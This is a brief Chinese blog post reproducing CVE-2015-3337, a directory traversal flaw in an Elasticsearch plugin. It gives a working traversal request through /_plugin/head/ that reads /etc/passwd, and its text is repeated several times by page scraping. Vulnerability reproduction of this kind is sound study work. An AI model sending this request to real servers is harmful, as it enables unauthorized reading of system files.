[漏洞复现] elasticsearch 目录遍历（CVE-2015-3337）

Elasticsearch 是一个分布式、RESTful 搜索和分析引擎，广泛应用于处理海量数据的实时搜索、日志分析、监控、数据存储等场景。它基于 Apache Lucene 构建，支持结构化和非结构化数据的高效索引和快速查询。Elasticsearch 是 Elastic Stack（通常称为 ELK Stack，包含 Elasticsearch、Logstash 和 Kibana）的核心组件。

通过字典爆破访问到了该页面，目录为/_plugin/head/

目录穿越漏洞：ElasticSearch安装插件后，通过…/可以向上层目录跳转，导致任意文件读取，exp如下：

/_plugin/head/../../../../../../../../../../..//etc/passwd

posted @ 2024-10-24 10:44 AuriGe 阅读(328) 评论(0) 收藏举报

刷新页面返回顶部

坚持、沉淀、成长

平静的海面培养不出优秀的水手

[漏洞复现] elasticsearch 目录遍历（CVE-2015-3337）

通过字典爆破访问到了该页面，目录为/_plugin/head/

目录穿越漏洞：ElasticSearch安装插件后，通过…/可以向上层目录跳转，导致任意文件读取，exp如下：

公告

坚持、沉淀、成长

平静的海面培养不出优秀的水手

[漏洞复现] elasticsearch 目录遍历 （CVE-2015-3337）

通过字典爆破访问到了该页面，目录为/_plugin/head/

目录穿越漏洞：ElasticSearch安装插件后，通过…/可以向上层目录跳转，导致任意文件读取，exp如下：

公告

[漏洞复现] elasticsearch 目录遍历（CVE-2015-3337）